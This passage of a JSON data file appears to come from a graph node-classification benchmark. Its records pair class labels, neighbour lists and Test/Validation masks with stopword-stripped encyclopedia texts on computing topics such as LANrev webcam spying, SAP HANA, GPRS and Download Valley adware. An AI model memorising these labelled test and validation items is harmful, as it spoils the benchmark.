    "text": "HEAT_LANrev:heat lanrev heat lanrev formerly absolute manage systems lifecycle management software used system administrators automate administration tasks product includes server client agent software runs windows mac os x. vancouver-based absolute acquired lanrev pole position software december 2009 us 12.1 million cash 500,000 shares absolute common stock lanrev rebranded absolute manage february 2010 july 2015 absolute announced intention divest absolute manage sale absolute manage heat software completed october 5 2015 us 11.0 million product renamed heat lanrev 2010 robbins v. lower merion school district case plaintiffs charged two suburban philadelphia high schools secretly spied students surreptitiously remotely activating webcams embedded school-issued laptops students using home therefore infringed privacy rights schools admitted secretly snapping 66,000 webshots screenshots including webcam shots students bedrooms lanrev software used lower merion school district student laptop program overseen network technician michael perbix february 2010 perbix administrators district accused using software take undisclosed unauthorized photographs students webcams macintosh laptops lawsuit brought parents 15-year-old sophomore blake robbins allegedly accused illicit behavior seen computer webcam bedroom photographs taken laptop reported stolen allegedly used evidence disciplinary action fbi investigated incident philadelphia federal judge intervened sort issues relating lawsuit perbix previously praised theft track name feature lets administrators remotely photograph potential thieves computer reported stolen noting youtube video produced ’ excellent feature yes used yes gleaned results us fantastic feature trying to—especially ’ school environment lot laptops ’ worried know laptops getting missing ’ actually laptops thought stolen actually still classroom misplaced time found back turn tracking know good twenty snapshots teacher students using machines classroom lanrev new owner absolute software denounced use software illegal purpose emphasizing theft recovery left law enforcement professionals denied knowledge complicity either perbix school district actions absolute stated next update lanrev would permanently disable theft track",
    "neighbors": [
      10747,
      6797,
      7406,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4598,
    "label": 1,
    "text": "Database_engine:database engine database engine storage engine underlying software component database management system dbms uses create read update delete crud data database database management systems include application programming interface api allows user interact underlying engine without going user interface dbms term database engine frequently used interchangeably database server database management system 'database instance refers processes memory structures running database engine many modern dbms support multiple storage engines within database example mysql supports innodb well myisam storage engines transactional additional engine types include database bits laid storage data structures groupings take advantage known effective algorithms retrieve manipulate properties typically storage designed meet requirements various areas extensively utilize storage including databases dbms operation always simultaneously utilizes several storage types e.g. memory external storage respective layout methods principle database storage viewed linear address space every bit data unique address address space practice small percentage addresses kept initial reference points also requires storage data accessed indirection using displacement calculations distance bits reference points data structures define access paths using pointers needed data effective manner optimized needed data access operations database operation resides simultaneously several types storage forming storage hierarchy nature contemporary computers database part inside computer hosts dbms resides partially replicated volatile storage data pieces database processed/manipulated reside inside processor possibly processor caches data read from/written memory typically computer bus far typically volatile storage components computer memory communicating data transferred to/from external storage typically standard storage interfaces networks e.g. fibre channel iscsi storage array common external storage unit typically storage hierarchy fast cache typically consisting volatile fast dram connected via standard interfaces drives possibly different speeds like flash drives magnetic disk drives non-volatile drives may connected magnetic tapes typically least active parts large database may reside database backup generations typically correlation exists currently storage speed price faster storage typically volatile data structure abstract construct embeds data well defined manner efficient data structure allows manipulation data efficient ways data manipulation may include data insertion deletion updating retrieval various modes certain data structure type may effective certain operations ineffective others data structure type selected upon dbms development best meet operations needed types data contains type data structure selected certain task typically also takes consideration type storage resides e.g. speed access minimal size storage chunk accessed etc. dbmss database administrators flexibility select among options data structures contain user data performance reasons sometimes data structures selectable parameters tune database performance databases may store data many data structure types common examples following contrast conventional row-orientation relational databases also column-oriented correlational way store data particular structure general substantial performance improvement gained different types database objects usually utilized together laid storage proximity clustered usually allows retrieve needed related objects storage minimum number input operations sometimes substantially time consuming even in-memory databases clustering provides performance advantage due common utilization large caches input-output operations memory similar resulting behavior example may beneficial cluster record item stock respective order records decision whether cluster certain objects depends objects utilization statistics object sizes caches sizes storage types etc indexing technique storage engines use improving database performance many types indexes share common property reduce need examine every entry running query large databases reduce query time/cost orders magnitude simplest form index sorted list values searched using binary search adjacent reference location entry analogous index back book data multiple indexes employee database could indexed last name hire date indexes affect performance results database designers add remove indexes without changing application logic reducing maintenance costs database grows database usage evolves indexes speed data access consume space database must updated time data altered indexes therefore speed data access slow data maintenance two properties determine whether given index worth cost",
    "neighbors": [
      4614,
      11017,
      1549,
      2066,
      3219,
      2068,
      10518,
      2456,
      5401,
      5403,
      7453,
      1950,
      9503,
      9634,
      10921,
      5546,
      9010,
      6451,
      10292,
      7863,
      3641,
      11324,
      6721,
      10565,
      4680,
      8393,
      6346,
      2130,
      7506,
      2901,
      9942,
      7767,
      736,
      7392,
      3427,
      8291,
      6245,
      9828,
      8295,
      8683,
      4844,
      10732,
      7022,
      10734,
      499,
      3188,
      6003,
      6521,
      9471
    ],
    "mask": "Test"
  },
  {
    "node_id": 4599,
    "label": 4,
    "text": "BitSight:bitsight bitsight cybersecurity ratings company analyzes companies government agencies educational institutions based back bay boston security ratings delivered bitsight used banks insurance companies among organizations company rated 100,000 businesses respect cybersecurity bitsight founded 2011 currently united states-based international employees 2016 bitsight raised us 40 million funding month september 2014 bitsight acquired anubisnetworks portugal-based cybersecurity firm tracks real-time data threats september 2016 bitsight raised 40 million series c round led ggv capital participation flybridge capital partners globespan capital partners menlo ventures shaun mcconnon vc divisions comcast ventures liberty global ventures singtel innov8 shaun mcconnon stepped ceo bitsight july 2017 remains executive chairman board ceo position filled tom turner june 2018 bitsight closed 60 million series funding bringing company total funding 155 million bitsight series financing led warburg pincus participation existing investors menlo ventures ggv capital singtel innov8 2018 company located cambridge purchased property order shift back bay bitsight currently located forbes estimated bitsight revenue us 100 million 2018 organizations purchase bitsight services order understand security risks associated sharing sensitive data business partners 2018 bitsight serves clients including lowe aig safeway produced 100,000 ratings respect cybersecurity companies bitsight assembles models produce company ratings based scale enables insurers rule ability businesses receive coverage respect services amy feldman forbes writes customers pay subscription basis annual fees ranging thousand dollars analyze single company 1 million review thousands suppliers similar credit score bitsight ratings range 250 900 bitsight released report examining ransomware infection across six industry sectors compiled 18,996 companies security ratings included examination ransomware infection across sectors education energy/utilities finance government healthcare retail companies security rating services spaces include riskrecon securityscorecard upguard others",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4600,
    "label": 4,
    "text": "Joint_Cybernetic_Operations_Command_(Italy):joint cybernetic operations command italy joint cybernetic operations command cioc italian cyberwarfare military unit project italian cyber command modelled united states cyber command envisaged 2015 defence white paper joint cybernetic operations command established 30 september 2017 intended achieve initial operational capability end 2018 full operational capability 2019 joint cybernetic operations command tasks areas information security computer network operations cyber warfare cyber security designed force provider according cioc commander air brigade general francesco vestito command two operational focus cyber-defence cyber network-defence cyber defence related static defence protection network carried cooperation rest italian military order ensure integrity network availability data flows cyber network-defence related ability carry vulnerability assessment penetration test order provide quick intervention joint cybernetic operations command supports protects military operations conducts offensive operations functions coordinating body italian armed forces italian cyber security institutions according defence undersecretary gioacchino alfano command intended operate mainly joint inter-agency nato contexts well coordination university economic worlds regard domestic cyber security organization department information security leadership via deputy director responsible cyber security operational arms joint cybernetic operations command state police cnaipic centro anticrimine informatico per la protezione delle infrastrutture critiche critical facilities anti-informatic crime protection centre well national cert ministries linked national cert cyber infrastructures command directly dependent chief defence staff defence staff italian armed forces particular depends deputy commander operations joint cybernetic operations command consists command staff element personnel section operational unit training unit cyber branch tlc school chiavari experimental unit tasked study malaware countermeasures command recruit also personnel part military operational unit handles cyber operational cells actual operational pawns cells tasked operate field field commander may employ order achieve operational goals command located near military intelligence service centro intelligence interforze castel malnome near rome far leonardo da vinci–fiumicino airport",
    "neighbors": [
      9688,
      3796
    ],
    "mask": "Test"
  },
  {
    "node_id": 4601,
    "label": 6,
    "text": "Tagsistant:tagsistant tagsistant semantic file system linux kernel written c based fuse unlike traditional file systems use hierarchies directories locate objects tagsistant introduces concept tags computing file system type data store could used store retrieve update files file uniquely located path user must know path advance access file path necessarily include information content file tagsistant uses complementary approach based tags user create set tags apply tags files directories objects devices pipes ... user search objects match subset tags called query kind approach well suited managing user contents like pictures audio recordings movies text documents incompatible system files like libraries commands configurations univocity path security requirement prevent access wrong content tagsistant file system features four main directories tags created sub directories codice_1 directory used queries complying syntax subquery arbitrarily long list tags concatenated directories portion path delimited codice_1 codice_5 actual query codice_6 operator joins results different sub-queries one single list codice_5 operator ends query returned result following query object must tagged codice_9 codice_10 codice_9 codice_12 object tagged codice_10 codice_12 codice_9 retrieved query syntax deliberately violates posix file system semantics allowing path token descendant like codice_16 codice_9 appears twice consequence recursive scan tagsistant file system exit error endlessly loop done unix codice_18 ~/tagsistant_mountpoint find tags/ tags/ tags/document tags/document/+ tags/document/+/document tags/document/+/document/+ tags/document/+/document/+/document tags/document/+/document/+/document/+ drawback balanced possibility list tags inside query order query codice_19 completely equivalent codice_20 codice_21 equivalent codice_22 codice_5 element precise purpose restoring posix semantics path codice_24 refers traditional directory recursive scan path properly perform tagsistant features simple reasoner expands results query including objects tagged related tags relation two tags established inside codice_25 directory following three level pattern codice_27 element includes is_equivalent include rock tag music tag unix command codice_28 used reasoner recursively resolve relations allowing creation complex structures web relations created inside codice_25 directory constitutes basic form ontology tagsistant features autotagging plugin stack gets called file symlink written plugin called declared mime type matches list working plugins released tagsistant 0.6 limited tagsistant file system corresponding repository containing codice_38 directory objects actually saved codice_39 file holding tagging information sqlite database mysql database engine specified codice_40 argument codice_39 file empty another file named codice_42 glib ini store repository configuration tagsistant 0.6 compatible mysql sqlite dialects sql tag reasoning tagging resolution porting logic sql dialects possible differences basic constructs especially intersect sql keyword must considered codice_38 directory introduced provide quick way access objects without using tags objects listed inode number prefixed codice_44 directory features read-only files containing usage statistics file codice_45 holds compile time information current repository configuration highlighted relying external database store tags tagging information could cause complete loss metadata database gets corrupted highlighted using flat namespace tends overcrowd codice_1 directory could mitigated introducing triple tags",
    "neighbors": [
      2432,
      1825,
      9762,
      5546,
      7022,
      7983,
      3571,
      2045,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4602,
    "label": 8,
    "text": "URL_Template:url template url template way specify url includes parameters must substituted url resolved standardized rfc 6570 march 2012 syntax usually enclose parameter braces example convention parameter percent encoded unless follows question mark building urls björk firstname =björk lastname =guðmundsdóttir would",
    "neighbors": [
      2945
    ],
    "mask": "None"
  },
  {
    "node_id": 4603,
    "label": 3,
    "text": "SSSE3:ssse3 supplemental streaming simd extensions 3 ssse3 sse3s simd instruction set created intel fourth iteration sse technology ssse3 first introduced intel processors based core microarchitecture june 26 2006 woodcrest xeons ssse3 referred codenames tejas new instructions tni merom new instructions mni first processor designs intended support ssse3 contains 16 new discrete instructions instruction act 64-bit mmx 128-bit xmm registers therefore intel materials refer 32 new instructions according intel ssse3 provide 32 instructions represented 14 mnemonics accelerate computations packed integers include table satsw x read 'saturate signed word takes signed integer x converts −32768 less −32768 +32767 greater 32767 leaves unchanged otherwise normal intel architecture bytes 8 bits words 16 bits dwords 32 bits 'register refers mmx xmm vector register nawaf 9",
    "neighbors": [
      9337,
      7938,
      3459,
      9092,
      2821,
      1798,
      3973,
      4491,
      4108,
      4237,
      5645,
      6924,
      9611,
      5649,
      6804,
      4886,
      6038,
      3352,
      8855,
      9111,
      7963,
      9369,
      9500,
      2719,
      5883,
      2088,
      3883,
      2094,
      9391,
      8120,
      8506,
      2237,
      1085,
      5309,
      8125,
      833,
      6978,
      6339,
      5444,
      7234,
      3142,
      8126,
      9541,
      11080,
      2764,
      1998,
      5326,
      977,
      2514,
      5073,
      5844,
      9428,
      3162,
      8795,
      2655,
      1119,
      1122,
      7783,
      1000,
      7657,
      8680,
      10985,
      4204,
      8684,
      5358,
      9582,
      8944,
      9964,
      499,
      1399,
      9976,
      4217,
      1915,
      10620
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4604,
    "label": 1,
    "text": "SAP_HANA:sap hana sap hana in-memory column-oriented relational database management system developed marketed sap se primary function database server store retrieve data requested applications addition performs advanced analytics predictive analytics spatial data processing text analytics text search streaming analytics graph data processing includes extract transform load etl capabilities well application server early development sap hana number technologies developed acquired sap se included trex search engine in-memory column-oriented search engine p*time in-memory online transaction processing oltp platform acquired sap 2005 maxdb in-memory livecache engine first major demonstration platform 2008 teams sap se hasso plattner institute stanford university demonstrated application architecture real-time analytics aggregation former sap se executive vishal sikka mentioned architecture hasso new architecture name hana stabilized people referred product new database software previously called sap high-performance analytic appliance first product shipped late november 2010 mid-2011 technology attracted interest experienced business customers considered early days hana support sap netweaver business warehouse announced september 2011 availability november 2012 sap promoted aspects cloud computing october 2012 sap announced platform service offering called sap hana cloud platform variant called sap hana one used smaller amount memory may 2013 managed private cloud offering called hana enterprise cloud service announced may 2013 business suite hana became available enabling customers run sap enterprise resource planning functions hana platform s/4hana released 2015 written specifically hana platform combines functionality erp crm srm others single hana system s/4hana intended simplified business suite replacing earlier generation erp systems likely sap focus innovations s/4hana customers using non-hana systems raised concerns locked sap products since s/4hana requires sap hana system run customers running sap business suite applications hardware certified sap would need migrate sap-certified hana database choose features offered s/4hana rather versioning software utilizes service packs referred support package stacks sps updates support package stacks released every 6 months november 2016 sap announced sap hana 2 offers enhancements multiple areas database management application management includes two new cloud services text analysis earth observation analysis hana customers upgrade hana 2 sps10 customers running sps9 must first upgrade sps12 upgrading hana 2 sps01 key distinctions hana previous generation sap systems column-oriented in-memory database combines olap oltp operations single system thus general sap hana oltap system storing data main memory rather disk provides faster data access extension faster querying processing storing data in-memory confers performance advantages costly form data storage observing data access patterns 85 data enterprise system may infrequently accessed therefore cost-effective store frequently accessed hot data in-memory less frequently accessed warm data stored disk approach sap termed dynamic tiering column-oriented systems store data single column location rather storing data single row location row-oriented systems enable performance improvements olap queries large datasets allows greater vertical compression similar types data single column read times column-stored data fast enough consolidated views data performed fly removing need maintaining aggregate views associated data redundancy although row-oriented systems traditionally favored oltp in-memory storage opens techniques develop hybrid systems suitable olap oltp capabilities removing need maintain separate systems oltp olap operations sap hana information modeling also known sap hana data modeling part hana application development modeling methodology expose operational data end user reusable virtual objects named calculation views used modelling process sap hana manages concurrency use multiversion concurrency control mvcc gives every transaction snapshot database point time mvcc database needs update item data overwrite old data new data instead mark old data obsolete add newer version scale-out environment hana keep volumes petabyte data in-memory returning query results second however ram still much expensive disk-space scale-out feasible certain time critical use-cases sap hana includes number analytic engines various kinds data processing business function library includes number algorithms made available address common business data processing algorithms asset depreciation rolling forecast moving average predictive analytics library includes native algorithms calculating common statistical measures areas clustering classification time series analysis hana incorporates open source statistical programming language r supported language within stored procedures column-store database offers graph database capabilities graph engine processes cypher query language also visual graph manipulation via tool called graph viewer graph data structures stored directly relational tables hana column store pre-built algorithms graph engine include pattern matching neighborhood search single shortest path strongly connected components typical usage situations graph engine include examples like supply chain traceability fraud detection logistics route planning hana also includes spatial database engine implements spatial data types sql extensions crud operations spatial data hana certified open geospatial consortium integrates esri arcgis geographic information system addition numerical statistical algorithms hana perform text analytics enterprise text search hana search capability based “ fuzzy ” fault-tolerant search much like modern web-based search engines results include statistical measure relevant search results search criteria include threshold accuracy results analyses available include identifying entities people dates places organizations requests problems entity extraction catered specific use cases voice customer customer preferences expectations enterprise i.e mergers acquisitions products organizations public sector public persons events organizations custom extraction dictionaries also implemented besides database data analytics capabilities sap hana web-based application server hosting user-facing applications tightly integrated database analytics engines hana xs advanced engine xsa natively works node.js javaee languages runtimes xsa based cloud foundry architecture thus supports notion “ bring language ” allowing developers develop deploy applications written languages runtimes xsa implements natively well deploying applications microservices xsa also allows server-side javascript xsjs supporting application server suite application lifecycle management tools allowing development deployment monitoring user-facing applications hana deployed on-premises cloud number cloud service providers hana deployed on-premises new appliance certified hardware vendor alternatively existing hardware components storage network used part implementation approach sap calls tailored data center integration tdi hana certified run multiple operating systems including suse linux enterprise server red hat enterprise linux supported hardware platforms on-premise deployment include intel 64 power systems system designed support horizontal vertical scaling multiple cloud providers offer sap hana infrastructure service basis including sap also offer cloud services form sap hana licensing primarily divided two categories runtime license used run sap applications sap business warehouse powered sap hana sap s/4hana full use license used run sap non-sap applications licensing used create custom applications part full use license features grouped editions targeting various use cases addition capabilities streaming etl licensed additional options march 9 2017 sap hana available express edition streamlined version run laptops resource-limited environments license sap hana express edition free charge even productive use 32 gb ram additional capacity increases purchased",
    "neighbors": [
      9344,
      11136,
      6018,
      3,
      3462,
      6920,
      1935,
      3219,
      10389,
      7446,
      151,
      1816,
      10518,
      5403,
      9631,
      11551,
      4781,
      10286,
      7983,
      10413,
      823,
      5691,
      2496,
      2880,
      5832,
      5833,
      3660,
      7248,
      3414,
      7767,
      9305,
      5210,
      4058,
      7930,
      11613,
      11233,
      4194,
      9828,
      4197,
      3560,
      2413,
      7412,
      7802,
      5499,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4605,
    "label": 4,
    "text": "Download_Valley:download valley download valley cluster software companies israel producing delivering adware installed alongside downloads software primary purpose monetize shareware downloads software items commonly browser toolbars adware browser hijackers spyware malware another group products download managers possibly designed induce trick user install adware downloading piece desired software mobile app certain source term refer actual geographical region valley pun based silicon valley common practice using downloads deliver bundled software users many companies located tel aviv surrounding region used israeli media well reports related business download managers download valley companies used major download portals software hosts including download.com cnet softonic.com sourceforge smaller adware companies sweetpacks smilebox purchased larger company perion networks 41 million 32 million ibario claimed worth 100 million early 2014 conduit valued 1.4 billion jp morgan 2012 revenues frequently near 100 million several 100 million large companies perion 87 million 2013 conduit claimed 500 million 2012 much lower operating net income perion 3.88 million operating 310.000 net income 2013 numbers highly volatile since technical legal preconditions quickly change profit opportunities 2013 2014 changes web browsers prevent unwanted toolbar installs new policy microsoft towards advertising lead expectation main profit methods companies would soon work longer perion stock lost roughly two thirds value 2014 13.25 january 4.53 december 29 many products may designed way install solicited user downloads desired product create revenue software usually distributed free may use invasive harmful techniques achieve installs installers may installed adware frequently attempts hide identity prevent disabling removal restoring previous settings spy user system browsing habits download install unwanted software open backdoors possibly malicious attacks many security software vendors list products category potentially unwanted programs pup also pus pua grayware offer detection removal category distinct genuine malware used software companies opposed criminal underground programmers threaten practice litigation 2013 download valley company ibario accused security software vendor trend micro distributing sefnit/mevade malware installer related ukrainian company considered immediately responsible malware unnamed download valley executive admitted wall street journal companies employ teams 15 developers break security suites try block software",
    "neighbors": [
      5607,
      106,
      107,
      9771,
      877,
      4013,
      5935,
      3473,
      1046,
      9055,
      10392,
      7515,
      4956,
      510,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4606,
    "label": 9,
    "text": "CLX_(Common_Lisp):clx common lisp clx standard x window system client library common lisp equivalent xlib library c programming language clx written solely common lisp use xlib clx contains data types functions macros interact x server sending requests receiving events replies",
    "neighbors": [
      4865,
      2438,
      9865,
      2062,
      9877,
      4122,
      1448,
      9128,
      4779,
      8883,
      6969,
      6201,
      7867,
      8258,
      8771,
      4550,
      11083,
      8908,
      1613,
      9299,
      1365,
      7896,
      2392,
      6493,
      7267,
      3176,
      2667,
      2804
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4607,
    "label": 4,
    "text": "MobileNotifier:mobilenotifier mobilenotifier free open-source alert messaging system written peter hajas jailbroken ios devices including iphone ipod touch ipad ios 4.0 mobile notifier written reproduction android notifications currently released bsd license lead developer peter hajas left work apple project continued developers software hooks operating system replace built-in modal notification user interface maintains queue unread messages user late may 2011 mobilenotifier 230,000 downloads mobilenotifier developed conjunction rensselaer center open source software rensselaer polytechnic institute mobilenotifier beta released 29 may 2011 included following new features solved following issues released 4 may 2011 included following new features solved following issues released 27 february 2011 included following new features solved following issues released 18 february 2011 included following new features solved following issues mobilenotifier beta1 officially released solved following issues",
    "neighbors": [
      9732,
      10470,
      9320,
      6539,
      5647,
      7983,
      2045,
      11221,
      3286,
      4957
    ],
    "mask": "Test"
  },
  {
    "node_id": 4608,
    "label": 9,
    "text": "ALCOR:alcor alcor early computer language definition created alcor group consortium universities research institutions manufacturers europe united states founded 1959 60 members 1966 group aim common compiler specification subset algol 60 algol meeting copenhagen 1958 alcor acronym algol converter addition naming alcor astronomical reference algol named addition programming application star algol way alcor also named astronomical reference star alcor europe high level machine architecture algol 60 devised emulated various real computers among siemens 2002 ibm 7090 algol manual published provided detailed introduction features language many program snippets four appendixes",
    "neighbors": [
      512,
      1952,
      8262,
      1610,
      1392,
      5496
    ],
    "mask": "Test"
  },
  {
    "node_id": 4609,
    "label": 5,
    "text": "General_Packet_Radio_Service:general packet radio service general packet radio service gprs packet oriented mobile data standard 2g 3g cellular communication network global system mobile communications gsm gprs established european telecommunications standards institute etsi response earlier cdpd i-mode packet-switched cellular technologies maintained 3rd generation partnership project 3gpp gprs typically sold according total volume data transferred billing cycle contrast circuit switched data usually billed per minute connection time sometimes one-third minute increments usage gprs bundled data cap may charged per mb data speed limited disallowed gprs best-effort service implying variable throughput latency depend number users sharing service concurrently opposed circuit switching certain quality service qos guaranteed connection 2g systems gprs provides data rates 56–114 kbit/sec 2g cellular technology combined gprs sometimes described 2.5g technology second 2g third 3g generations mobile telephony provides moderate-speed data transfer using unused time division multiple access tdma channels example gsm system gprs integrated gsm release 97 newer releases gprs core network allows 2g 3g wcdma mobile networks transmit ip packets external networks internet gprs system integrated part gsm network switching subsystem gprs extends gsm packet circuit switched data capabilities makes following services possible sms gprs used sms transmission speed 30 sms messages per minute may achieved much faster using ordinary sms gsm whose sms transmission speed 6 10 sms messages per minute gprs supports following protocols tcp/ip used phone one ip addresses allocated gprs store forward ip packets phone even handover tcp restores packets lost e.g due radio noise induced pause devices supporting gprs grouped three classes class device must service gprs gsm networks together effectively needs two radios avoid hardware requirement gprs mobile device may implement dual transfer mode dtm feature dtm-capable mobile handle gsm packets gprs packets network coordination ensure types transmitted time devices considered pseudo-class sometimes referred simple class networks supported dtm since 2007 usb 3g/gprs modems terminal-like interface usb v.42bis rfc 1144 data formats models include external antenna connector modem cards laptop pcs external usb modems available similar shape size computer mouse pendrive gprs connection established reference access point name apn apn defines services wireless application protocol wap access short message service sms multimedia messaging service mms internet communication services email world wide web access order set gprs connection wireless modem user must specify apn optionally user name password rarely ip address provided network operator gsm module gprs modules similar modems ’ one difference modem external piece equipment whereas gsm module gprs module integrated within electrical electronic equipment embedded piece hardware gsm mobile hand complete embedded system comes embedded processors dedicated provide functional interface user mobile network upload download speeds achieved gprs depend number factors multiple access methods used gsm gprs based frequency division duplex fdd tdma session user assigned one pair up-link down-link frequency channels combined time domain statistical multiplexing makes possible several users share frequency channel packets constant length corresponding gsm time slot down-link uses first-come first-served packet scheduling up-link uses scheme similar reservation aloha r-aloha means slotted aloha s-aloha used reservation inquiries contention phase actual data transferred using dynamic tdma first-come first-served channel encoding process gprs consists two steps first cyclic code used add parity bits also referred block check sequence followed coding possibly punctured convolutional code coding schemes cs-1 cs-4 specify number parity bits generated cyclic code puncturing rate convolutional code coding schemes cs-1 cs-3 convolutional code rate 1/2 i.e input bit converted two coded bits coding schemes cs-2 cs-3 output convolutional code punctured achieve desired code rate coding scheme cs-4 convolutional coding applied following table summarises options least robust fastest coding scheme cs-4 available near base transceiver station bts robust coding scheme cs-1 used mobile station ms away bts using cs-4 possible achieve user speed 20.0 kbit/s per time slot however using scheme cell coverage 25 normal cs-1 achieve user speed 8.0 kbit/s per time slot 98 normal coverage newer network equipment adapt transfer speed automatically depending mobile location addition gprs two gsm technologies deliver data services circuit-switched data csd high-speed circuit-switched data hscsd contrast shared nature gprs instead establish dedicated circuit usually billed per minute applications video calling may prefer hscsd especially continuous flow data endpoints following table summarises possible configurations gprs circuit switched data services multislot class determines speed data transfer available uplink downlink directions value 1 45 network uses allocate radio channels uplink downlink direction multislot class values greater 31 referred high multislot classes multislot allocation represented example 5+2 first number number downlink timeslots second number uplink timeslots allocated use mobile station commonly used value class 10 many gprs/egprs mobiles uses maximum 4 timeslots downlink direction 2 timeslots uplink direction however simultaneously maximum number 5 simultaneous timeslots used uplink downlink network automatically configure either 3+2 4+1 operation depending nature data transfer high end mobiles usually also supporting umts also support gprs/edge multislot class 32 according 3gpp ts 45.002 release 12 table b.1 mobile stations class support 5 timeslots downlink 3 timeslots uplink maximum number 6 simultaneously used timeslots data traffic concentrated downlink direction network configure connection 5+1 operation data transferred uplink network time change constellation 4+2 3+3 best reception conditions i.e best edge modulation coding scheme used 5 timeslots carry bandwidth 5*59.2 kbit/s 296 kbit/s uplink direction 3 timeslots carry bandwidth 3*59.2 kbit/s 177.6 kbit/s multislot class identifies following different multislot class specification detailed annex b 3gpp technical specification 45.002 multiplexing multiple access radio path maximum speed gprs connection offered 2003 similar modem connection analog wire telephone network 32–40 kbit/s depending phone used latency high round-trip time rtt typically 600–700 ms often reaches 1s gprs typically prioritized lower speech thus quality connection varies greatly devices latency/rtt improvements via example extended ul tbf mode feature generally available also network upgrades features available certain operators enhancements active round-trip time reduced resulting significant increase application-level throughput speeds gprs opened 2000 packet-switched data service embedded channel-switched cellular radio network gsm gprs extends reach fixed internet connecting mobile terminals worldwide cellpac protocol developed 1991-1993 trigger point starting 1993 specification standard gprs etsi smg especially cellpac voice data functions introduced 1993 etsi workshop contribution anticipate later known roots gprs workshop contribution referenced 22 gprs related us-patents successor systems gsm/gprs like w-cdma umts lte rely key gprs functions mobile internet access introduced cellpac according study history gprs development bernhard walke student peter decker inventors gprs – first system providing worldwide mobile internet access",
    "neighbors": [
      11267,
      11655,
      2701,
      3086,
      1424,
      529,
      10770,
      8472,
      11545,
      2458,
      5274,
      5531,
      669,
      5659,
      1695,
      8736,
      6178,
      2979,
      5028,
      167,
      10410,
      7723,
      11181,
      4399,
      2996,
      5175,
      4283,
      2492,
      3140,
      7877,
      2502,
      199,
      456,
      10053,
      7498,
      9038,
      464,
      9809,
      4691,
      854,
      3286,
      6870,
      8794,
      6748,
      5469,
      5470,
      10206,
      5472,
      1121,
      8160,
      4324,
      5991,
      7400,
      361,
      2285,
      8432,
      6001,
      2802,
      5875,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 4610,
    "label": 4,
    "text": "Imprivata:imprivata imprivata security company based lexington massachusetts founded 2002 imprivata develops sells onesign platform securing employee access desktops networks applications using single sign-on 2017 imprivata 1,700 clients several offices across america europe australia imprivata customers primarily healthcare industries imprivata became public company june 25 2014 listed new york stock exchange acquired private equity investment firm thoma bravo llc 2016 imprivata founded phil scarfo david ting developed identity management technology working polaroid corporation ’ small business incubator company shipped first product onesign enterprise single sign-on appliance 2004 2005 imprivata expanded europe africa middle east 2006 imprivata founder david ting selected infoworld one top 25 chief technology officers year 2009 imprivata acquired assets identiphi manufacturer reseller biometric technology including safsolution product line 2011 acquired assets validus medical systems santa cruz california incorporated imprivata cortext technology july 2016 imprivata announced agreed acquired thoma bravo private equity firm based san francisco 19.25 per share estimated total 544 million omar hussain chief executive time imprivata onesign helps companies manage user access authentication product reviews suggest onesign allows companies enable enterprise applications single sign without requiring custom scripting modifications existing directories onesign also strengthen user authentication desktops networks replacing passwords range authentication options include finger biometrics proximity cards smart cards many national government id cards one-time-password tokens employee ’ physical location product reviews also comment onesign ability simplify compliance reporting consolidating employee strong authentication application access events single database",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4611,
    "label": 2,
    "text": "Linux_Router_Project:linux router project linux router project lrp defunct networking-centric micro linux distribution released versions lrp small enough fit single 1.44mb floppy disk made building maintaining routers access servers thin servers thin clients network appliances typically embedded systems next trivial lrp conceived primarily developed dave cinege 1997 2002 began originally 'router floppy evolved streamlined general purpose network operating system lrp oldest embedded linux distribution formed whole part basis many embedded system distributions commercial products followed several parts developed specifically enhanced lrp still found common usage today posixness busybox dave cinege worked version 4.0 rewrite lrp late 2000 january 2001 began testing ideas proof concept code claimed radical departure status quo surprise new direction seemed ideal prompting abandon work done lrp 4.0 begin scratch new os named lrp 5.0 lrp 5.0 development headed towards complete rewrite reimplementation linux userland new standard design outside posix specification stated purpose provide modern standard base operating system suitable application including embedded systems appliances servers desktop computers cinege however stopped work several months later due financial reasons refused release work even name os due animosity towards computer industry perceived plundering open source authors work large corporations may 6 2003 cinege updated lrp website reflect project abandoned",
    "neighbors": [
      516,
      8837,
      2825,
      8957,
      7435,
      10127,
      2321,
      4887,
      10394,
      1436,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7082,
      3885,
      686,
      7854,
      7983,
      2738,
      4790,
      439,
      56,
      59,
      3007,
      3903,
      4673,
      10303,
      10433,
      2375,
      4039,
      5959,
      5322,
      8907,
      9927,
      11086,
      7887,
      10451,
      1110,
      9048,
      1754,
      5978,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      9461,
      6393,
      11388,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4612,
    "label": 9,
    "text": "QED_manifesto:qed manifesto qed manifesto proposal computer-based database mathematical knowledge strictly formalized proofs checked automatically q.e.d means latin meaning demonstrated idea project arose 1993 mainly impetus robert boyer goals project tentatively named qed project project qed outlined qed manifesto document first published 1994 input several researchers explicit authorship deliberately avoided dedicated mailing list created two scientific conferences qed took place first one 1994 argonne national laboratories second 1995 warsaw organized mizar group project seems died 1996 never produced discussions plans 2007 paper freek wiedijk identifies two reasons failure project order importance nonetheless qed-style projects regularly proposed mizar library successfully formalized large portion undergraduate mathematics largest library another project metamath proof database 2014 twenty years qed manifesto workshop organized part vienna summer logic",
    "neighbors": [
      4455,
      369,
      5585,
      10641,
      9492,
      11028,
      4791,
      9816,
      8924,
      4446
    ],
    "mask": "Test"
  },
  {
    "node_id": 4613,
    "label": 1,
